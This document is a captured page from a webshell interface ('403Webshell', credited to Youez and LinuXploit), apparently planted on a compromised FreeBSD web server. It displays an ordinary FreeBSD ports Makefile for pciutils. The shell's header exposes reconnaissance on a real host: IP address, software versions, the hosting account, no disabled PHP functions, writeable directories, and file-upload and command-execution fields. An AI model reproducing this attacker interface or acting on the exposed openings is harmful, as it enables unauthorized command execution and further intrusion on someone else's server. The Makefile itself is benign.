403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/pciutils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/pciutils/Makefile
PORTNAME=	pciutils
PORTVERSION=	3.8.0
CATEGORIES=	sysutils
MASTER_SITES=	KERNEL_ORG/software/utils/pciutils \
		LOCAL/sunpoet

MAINTAINER=	sunpoet@FreeBSD.org
COMMENT=	PCI configuration utilities
WWW=		https://mj.ucw.cz/sw/pciutils/

LICENSE=	GPLv2
LICENSE_FILE=	${WRKSRC}/COPYING

BUILD_DEPENDS=	libpci>=${PORTVERSION}:devel/libpci
LIB_DEPENDS=	libpci.so:devel/libpci
RUN_DEPENDS=	${LOCALBASE}/share/pciids/pci.ids:misc/pciids

USES=		gmake localbase:ldflags tar:xz

ALL_TARGET=	lspci lspci.8 setpci setpci.8
CFLAGS+=	-fPIC
LDFLAGS+=	-lpci

PLIST_FILES=	bin/lspci \
		bin/setpci \
		share/man/man8/lspci.8.gz \
		share/man/man8/setpci.8.gz

do-configure:
	${CP} ${LOCALBASE}/include/pci/config.h ${WRKSRC}/lib/config.h
	${CP} ${LOCALBASE}/share/libpci/config.mk ${WRKSRC}/lib/config.mk

do-install:
	${INSTALL_PROGRAM} ${WRKSRC}/lspci ${WRKSRC}/setpci ${STAGEDIR}${PREFIX}/bin/
	${INSTALL_MAN} ${WRKSRC}/lspci.8 ${WRKSRC}/setpci.8 ${STAGEDIR}${PREFIX}/share/man/man8/

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit